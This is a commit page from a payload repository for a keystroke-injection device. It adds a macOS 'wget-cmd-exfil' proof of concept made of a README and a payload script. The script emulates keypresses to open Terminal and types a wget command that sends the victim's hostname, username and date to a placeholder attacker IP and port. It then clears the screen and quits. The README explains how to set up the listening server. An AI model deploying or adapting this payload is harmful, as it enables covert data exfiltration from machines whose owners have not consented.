Add wget-cmd-exfil payload for mac osx

Basic PoC to exfil data using wget
whid-injector · Sep 12, 2019 · e826079 · e826079
1 parent 70d7145
commit e826079
Show file tree

Hide file tree

Showing 2 changed files with 32 additions and 0 deletions.
diff --git a/Payloads/mac-osx/wget-cmd-exfil/README.md b/Payloads/mac-osx/wget-cmd-exfil/README.md
@@ -0,0 +1,28 @@
+# PoC to exfil data using wget
+
+* Author: [dunderhay](https://github.com/dunderhay)
+* Version: Version 0.1
+* Target: Mac-OSX
+
+# Description
+
+Basic Proof on Concept to exfil data from terminal app using wget.
+
+# Notes
+
+Change the Attacker IP address and port number as required.
+
+## Start listener first
+
+You can use whatever web server you want or just use python:
+
+`python -m SimpleHTTPServer <port>`
+
+## Keys Used
+
+The following keys presses are emulated:
+
+| Key | In English | What it does |
+| --- | ------------ | ---------- |
+| 131+32 | Command (⌘) + Spacebar | Opens spotlight |
+| 131+113 | Command (⌘) + q | Quit app |
diff --git a/Payloads/mac-osx/wget-cmd-exfil/payload.txt b/Payloads/mac-osx/wget-cmd-exfil/payload.txt
@@ -0,0 +1,4 @@
+Press:131+32
+PrintLine:terminal
+PrintLine:wget "http://<attacker_ip>:<port>/?host=`hostname`&user=`whoami`&date=`date`"; clear
+Press:131+113